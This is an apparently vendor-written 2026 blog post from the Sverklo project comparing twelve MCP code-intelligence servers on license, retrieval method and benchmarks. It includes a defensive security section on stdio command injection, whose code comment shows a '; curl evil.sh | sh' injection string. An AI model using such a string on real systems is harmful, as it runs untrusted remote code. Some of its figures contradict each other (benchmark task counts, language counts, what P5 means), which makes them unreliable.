Best MCP Servers for Code Intelligence — Honest Comparison of 12 Options (2026)
An opinionated landscape of 12 servers, with a comparison matrix you can actually use. Honest about where Sverklo (the project that wrote this guide) loses.
What MCP actually is (60 seconds)
Model Context Protocol (MCP) is a JSON-RPC spec that lets a language-model client (Claude Code, Cursor, Windsurf, Cline, Zed, the Cursor SDK, the Anthropic SDK) call external tools the model author didn't ship. Tools live in servers — separate processes the client launches over stdio or talks to over HTTP. Each tool has a name, a schema, and a description; the model picks them up at conversation start and treats them like first-class functions.
The practical effect: instead of waiting for Anthropic to add a "search my repo" tool to Claude, you run a local MCP server that exposes my_repo_search and the agent uses it. The server can do anything — query a database, hit an internal API, run a tree-sitter parser, whatever.
For code intelligence specifically, MCP closes a loop that was previously broken: the agent stops being limited to its built-in grep / read / glob tools and starts seeing the codebase through your retrieval pipeline. That's the whole pitch.
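To make the mechanics concrete, here is roughly what a minimal search server looks like with the official TypeScript SDK (@modelcontextprotocol/sdk). This is a sketch, not any server from the matrix below: the my_repo_search tool, its schema, and the stubbed searchIndex function are invented for illustration.

```typescript
import { McpServer } from "@modelcontextprotocol/sdk/server/mcp.js";
import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js";
import { z } from "zod";

// Stand-in for your real retrieval pipeline (BM25, embeddings, whatever).
async function searchIndex(query: string, limit: number): Promise<string[]> {
  return [`(stub) top ${limit} results for: ${query}`];
}

// A server is just a process the client spawns; tools are named, typed functions.
const server = new McpServer({ name: "my-repo-search", version: "0.1.0" });

// The model sees the tool's name, schema, and description at conversation start
// and can call it like a first-class function.
server.tool(
  "my_repo_search",
  "Search this repository for code relevant to a natural-language query",
  { query: z.string(), limit: z.number().optional() },
  async ({ query, limit }) => {
    const hits = await searchIndex(query, limit ?? 10);
    return { content: [{ type: "text", text: hits.join("\n") }] };
  }
);

// stdio transport: the client launches this process and talks over stdin/stdout.
await server.connect(new StdioServerTransport());
```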
A taxonomy: four kinds of code-intel MCP
The category is less unified than the marketing makes it sound. There are four meaningfully different things people call "code-intel MCP," and mixing them up causes most of the confusion in side-by-side comparisons.
1. Search servers
Index your repo (BM25 / embeddings / both) and answer "find me code about X." Examples: Claude Context (Zilliz), Local Code Search MCP, grepai, Seroost. Strength: cheap exploration. Weakness: no graph, no impact analysis, no memory.
2. Knowledge-graph / structural servers
Build a call graph or symbol graph and let the agent traverse it. Examples: GitNexus, CodeGraphContext, code-graph-mcp, codesight-mcp. Strength: structural queries ("what calls X transitively?"). Weakness: graph-only is bad at semantic recall and weak at ranking; many require Neo4j or Kuzu.
3. LSP-backed semantic servers
Wrap a Language Server Protocol implementation and expose its rename / refs / definition signals as MCP tools. Examples: Serena. Strength: precision (real renames, not regex). Weakness: requires a working LSP per language; configuration-heavy.
4. Hybrid / "all-of-the-above" intelligence servers
Combine search, structure, ranking, and memory. Examples: Sverklo (this site), jcodemunch-mcp (search + tree-sitter symbols), codebase-memory-mcp. Strength: covers more failure modes. Weakness: heavier installs and more complex to evaluate (which is why we wrote a benchmark).
None of these is wrong. They're answers to different questions. The decision tree below walks through which one matches your workload.
The comparison matrix (12 servers)
Numbers verified May 2026. Star counts and license terms change; for a value as load-bearing as the license, click through and read the actual LICENSE file before relying on this table.
| Server | Category | License | Stars | Hosting | Languages | Tools | Retrieval substrate | Memory layer |
|---|---|---|---|---|---|---|---|---|
| Sverklo | Hybrid | MIT | growing | Local (SQLite + ONNX) | 12 | 37 | BM25 + embeddings + PageRank (RRF) | Bi-temporal, git-SHA pinned |
| GitNexus | Knowledge graph | PolyForm Noncommercial 1.0 | ~28-35K | Local (KuzuDB) + browser UI | 14 | ~12 | Cypher graph queries | None |
| Serena | LSP-backed | MIT | ~24K | Local (LSP processes) | 40+ (via LSP) | ~15 | LSP refs/defs/renames | None |
| jcodemunch-mcp | Search + symbols | Dual: free non-commercial; $79–$1,999 commercial | ~1.7K | Local (Python) | 10+ | ~6 | Tree-sitter symbol index | None |
| Claude Context | Search | Apache 2.0 | ~6K | Local + external Milvus | broad | ~5 | BM25 + dense vectors (Milvus) | None |
| codebase-memory-mcp | Hybrid (light) | Open source | ~1.6K | Local (single static binary) | 66 | ~10 | Symbol KG + git-aware diff | Shallow |
| CodeGraphContext | Knowledge graph | MIT | ~3K | Local (Neo4j) | broad | ~8 | Neo4j graph queries | None |
| code-graph-mcp | Knowledge graph | MIT | smaller | Local | 5+ | ~6 | Tree-sitter symbol graph | None |
| Code Pathfinder | Search + AST | Apache 2.0 | smaller | Local | ~6 | ~7 | AST + structural queries | None |
| Local Code Search MCP | Search | MIT | smaller | Local | broad | ~3 | Lexical + simple ranking | None |
| code-review-graph | Hybrid | MIT | ~13.5K | Local (SQLite + FTS5) | 23 | 28 | FTS5 + RRF + optional embeddings | Lite |
| Greptile (not strictly MCP) | Cloud PR review | Closed / paid | n/a | Cloud (their infra) | broad | n/a | Hosted hybrid | Hosted |
Greptile included for completeness — it's the named cloud incumbent in the category, although it doesn't ship as an MCP server. Listed here so the comparison answers the literal question many engineers ask: "open-source alternative to Greptile."
Decision tree: which one for you?
The right question isn't "which is best" — there is no best. It's "which trade-offs do I want to make." Walk this tree top to bottom; the first matching answer is the practical recommendation.
Q1. Can your code legally leave the machine?
- No (compliance, regulated industry, customer contract): you need local-first. Skip Greptile entirely. Skip Claude Context if you don't want to run Milvus.
- Yes: Greptile becomes a viable option for hosted PR review specifically, and you have the full local set as well.
Q2. Is the project commercial?
- Yes (any agency, contractor, SaaS, or company that pays anyone to use the tool): you cannot use GitNexus without a separate commercial license from Akon Labs (PolyForm Noncommercial 1.0 forbids commercial use). You cannot use the free tier of jcodemunch-mcp; their commercial tiers run $79–$1,999 depending on team size. MIT-licensed servers (Sverklo, Serena, CodeGraphContext, code-review-graph) are unrestricted.
- No (personal, OSS contribution, evaluation): all options are open.
Q3. What's your dominant retrieval workload?
- "Find every caller of X" (P2) — a well-tuned ripgrep ties most graph-based servers on this. Surprisingly, smart-grep alone is competitive; the bench numbers are below. If P2 is dominant, skip the heavy infrastructure and just configure ripgrep with sensible defaults.
- "Where is X defined?" (P1) — jcodemunch-mcp is the strongest at 0.65 F1 on the public sverklo bench. Sverklo is at 0.45.
- "What does this codebase do?" / 5-minute mental model — you want PageRank-ranked overviews. Sverklo's
sverklo_overviewand code-review-graph's wiki feature both do this. - "What breaks if I change this?" (P5 / blast radius) — call-graph-aware servers (Sverklo, GitNexus, CodeGraphContext). Don't bother with pure search servers for this question.
- "What did we decide last week?" (memory) — only Sverklo (bi-temporal git-SHA pinned), code-review-graph (lite memory), and codebase-memory-mcp (shallow) have any memory layer. Most others have none.
- "Risk-scored PR review" — Sverklo (
sverklo review), Greptile (cloud bot). Different deployment models; same goal.
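For the blast-radius question, what the call-graph-aware servers do under the hood amounts to a transitive traversal of a reverse call graph. A minimal sketch, with an invented toy graph; real servers add ranking, depth limits, and language-aware edge extraction on top:

```typescript
// Maps each function to the functions that call it (a reverse call graph).
type CallGraph = Map<string, string[]>;

// Blast radius: every function that could be affected, transitively, by changing `target`.
function blastRadius(callers: CallGraph, target: string): Set<string> {
  const affected = new Set<string>();
  const queue = [target];
  while (queue.length > 0) {
    const fn = queue.pop()!;
    for (const caller of callers.get(fn) ?? []) {
      if (!affected.has(caller)) {
        affected.add(caller);
        queue.push(caller);
      }
    }
  }
  return affected;
}

// Toy graph: main -> handler -> parseConfig, plus a test that calls parseConfig directly.
const callers: CallGraph = new Map([
  ["parseConfig", ["handler", "parseConfig.test"]],
  ["handler", ["main"]],
]);
console.log(blastRadius(callers, "parseConfig")); // Set { handler, parseConfig.test, main }
```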
Q4. What's the install pain you can absorb?
- None — must be one command. Sverklo (`npm i -g sverklo && sverklo init`). codebase-memory-mcp (single binary). That's basically it.
- I can install Python and a few deps. Add jcodemunch-mcp, Code Pathfinder.
- I can run a database (Neo4j / Kuzu / Milvus). Add CodeGraphContext, GitNexus, Claude Context.
- I'll set up LSPs per language. Add Serena.
Q5. Do you need a published, reproducible benchmark to defend the choice to your team?
Sverklo is the only entry in the matrix above with a peer-reviewable benchmark and reproducible eval harness (sverklo.com/bench) — 90 tasks, 5 baselines, raw data downloadable. The methodology repo at github.com/sverklo/sverklo-bench is open for new baseline submissions. If "we picked X because the vendor said it's best" isn't a defensible answer in your org, having a shared eval matters.
Security PSA (read this even if you skip everything else)
MCP's stdio transport spawns child processes. If the MCP client passes the server command string through a shell, an attacker who controls part of that string can execute arbitrary commands. Anthropic's stance is that this is by design — stdio is intended for local trusted use. That's defensible, but "by design" is also where real users get burned, because client implementers shell out via `sh -c` for convenience.
Four rules:
- Never pass server commands through a shell. Use exec-style spawn (see the sketch after this list).
- Treat any user-controlled config as untrusted input.
- Pin server binaries by absolute path or content hash.
- Sandbox at the OS level (containers, sandbox-exec).
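Rule 1, in concrete terms. Most MCP clients are Node or Electron apps, so here is the difference as a Node sketch; the server path and arguments are placeholders, not any real client's config.

```typescript
import { spawn } from "node:child_process";

// BAD: the whole command string is re-parsed by a shell, so anything an attacker
// can sneak into it ("; curl evil.sh | sh") executes.
// spawn(serverCmdString, { shell: true });

// GOOD: exec-style spawn. argv is an array, nothing is shell-parsed,
// and the binary is pinned by absolute path (placeholder path shown).
const child = spawn(
  "/usr/local/bin/my-mcp-server",
  ["--project", "/home/me/repo"],        // arguments passed as data, not parsed as shell
  { stdio: ["pipe", "pipe", "inherit"] } // stdin/stdout for MCP, stderr to the terminal
);

child.stdout?.on("data", (chunk: Buffer) => {
  // Newline-delimited JSON-RPC messages from the server arrive here.
  process.stderr.write(`server says: ${chunk.toString()}`);
});
```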
Full writeup with the 30-second audit grep one-liners: MCP STDIO command-injection audit.
Glossary
- MCP (Model Context Protocol)
- JSON-RPC spec for tool servers that LLM clients (Claude Code, Cursor, etc.) call at runtime. Open spec; no Anthropic-only dependency.
- BM25
- Lexical ranking function from classical information retrieval. Fast, deterministic, strong on rare identifiers. Bad at concepts.
- RRF (Reciprocal Rank Fusion)
- Standard way to combine multiple ranked result lists (e.g., BM25 + embeddings) without tuning weights. Simple and surprisingly competitive. (Short sketch at the end of this glossary.)
- PageRank on a call graph
- Treats functions as nodes and calls as edges; central functions get higher scores. Used to rank retrieval results so load-bearing code surfaces first.
- Tree-sitter
- Incremental parser library. The de facto AST parser for code-intel servers because it handles incomplete / broken code gracefully.
- Bi-temporal memory
- Memory store that tracks both when a fact was true in the codebase (git SHA) and when the agent learned it (wall clock). Keeps agent recall from drifting when you `git checkout` back to an older state.
- Blast radius
- Set of all functions that could be affected (transitively) by a change to a given function. Computed from the call graph.
- P1, P2, P4, P5
- Sverklo bench category labels: P1 = symbol definition lookup, P2 = reference finding, P4 = file dependencies, P5 = dead code detection. Used throughout this comparison.
- Stdio transport
- MCP's local transport: client spawns server as a subprocess and talks over stdin/stdout. Default for local-first servers. See security PSA above.
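The RRF entry above is worth seeing in code, because the whole technique fits in a dozen lines. A sketch with invented file names; k = 60 is the constant from the original RRF paper, and most implementations keep it.

```typescript
// Reciprocal Rank Fusion: combine several ranked lists without tuning weights.
// Each list contributes 1 / (k + rank) for every document it ranks.
function rrf(rankings: string[][], k = 60): Map<string, number> {
  const scores = new Map<string, number>();
  for (const ranking of rankings) {
    ranking.forEach((doc, i) => {
      scores.set(doc, (scores.get(doc) ?? 0) + 1 / (k + i + 1));
    });
  }
  // Highest fused score first.
  return new Map([...scores].sort((a, b) => b[1] - a[1]));
}

// BM25 and embedding retrieval disagree; RRF rewards documents both rank highly.
const bm25 = ["auth.ts", "db.ts", "util.ts"];
const dense = ["db.ts", "auth.ts", "cache.ts"];
console.log(rrf([bm25, dense])); // db.ts and auth.ts float to the top
```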
Where Sverklo loses (honest section)
This guide is published on the sverklo blog, so the right thing to do is name the cases where sverklo is not the right choice. From the public bench and from real usage:
- jcodemunch-mcp wins P1 (definition lookup) at 0.65 F1 vs sverklo's 0.45. Their tree-sitter symbol indexing is sharper than ours. If you spend most of your time asking "where is X defined?", jcodemunch is the better tool.
- Smart-grep ties sverklo on P2 (reference finding) at 0.50 F1 each. The semantic graph adds nothing to a textually-pure question. If P2 is dominant in your workflow, sverklo is genuinely overkill — well-configured ripgrep is fine.
- Cypher graph expressiveness is something sverklo doesn't offer at all. If you want to write ad-hoc graph queries against your codebase ("show me every function in `auth/` that calls something in `db/`"), GitNexus's Cypher interface is the right tool.
- 40+ language coverage via LSPs belongs to Serena. Sverklo parses 24 languages — 10 first-class (tree-sitter or custom: TS, JS, Python, Go, Rust, C#, Vue, Markdown, Jupyter) and 14 via regex fallback. If your codebase is a polyglot of obscure languages with semantic-correctness requirements, Serena via LSP wins on coverage.
- Cold-start indexing on very large repos. First-time index of a 500K-LOC repo takes ~5 minutes on sverklo. After that it's incremental and fast, but the first run isn't free.
The matrix and decision tree above try to be honest about all of this. The case for sverklo isn't "it wins every category" — it doesn't. The case is: if you need local-first + commercial-friendly + multi-tool surface + persistent memory + an actually-published benchmark, no other server in the matrix offers all five.
What to try first
If you've read this far and want to actually run one of these on a real repo today:
```bash
npm install -g sverklo
cd your-project
sverklo init
sverklo receipt   # see what your agent has been spending tokens on
```
`sverklo init` auto-detects your AI coding agent (Claude Code, Cursor, Windsurf, Zed) and writes the right MCP config. `sverklo receipt` parses your last week of Claude Code session logs and prints a Spotify-Wrapped-style breakdown of where your tokens went — useful as a baseline before/after.
If sverklo isn't the right pick after reading the decision tree, try one of the others linked in the matrix. Honest landscape post; I'm not pretending the answer is always us.
To reproduce the numbers yourself, run `npm run bench` in the repo: 60 tasks, 5 baselines, raw data at sverklo.com/bench. If you find a number wrong, open an issue.
Updated: May 3, 2026 · 3,200 words · MIT-licensed prose, reuse with attribution